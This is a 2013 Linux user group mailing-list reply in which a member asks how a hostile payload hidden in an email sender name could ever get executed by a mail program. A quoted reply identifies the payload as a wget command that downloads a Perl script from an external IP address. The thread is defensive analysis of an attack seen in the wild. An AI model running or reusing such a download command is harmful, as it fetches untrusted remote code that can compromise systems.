[GLLUG] Can anyone tell me what this is trying to do?
John Winters
john at sinodun.org.uk
Mon Nov 4 16:39:13 UTC 2013
On Mon, 4 Nov 2013 16:34:43 -0000, "Martin A. Brooks"
<martin at hinterlands.org> wrote:
> On Mon, November 4, 2013 16:26, John Winters wrote:
[snip]
>> I've been googling, but can't discover what this is trying to do. Is
it
>> a
>> current vulnerability in any common MTA?
>
> wget http://117.239.156.162/user.pl
OK - I should have made my question clearer. I can see the payload, but
I'm puzzled as to how the line of code would come to be executed in the
first place. What MTA or MUA would execute the sender's name?
John
More information about the GLLUG
mailing list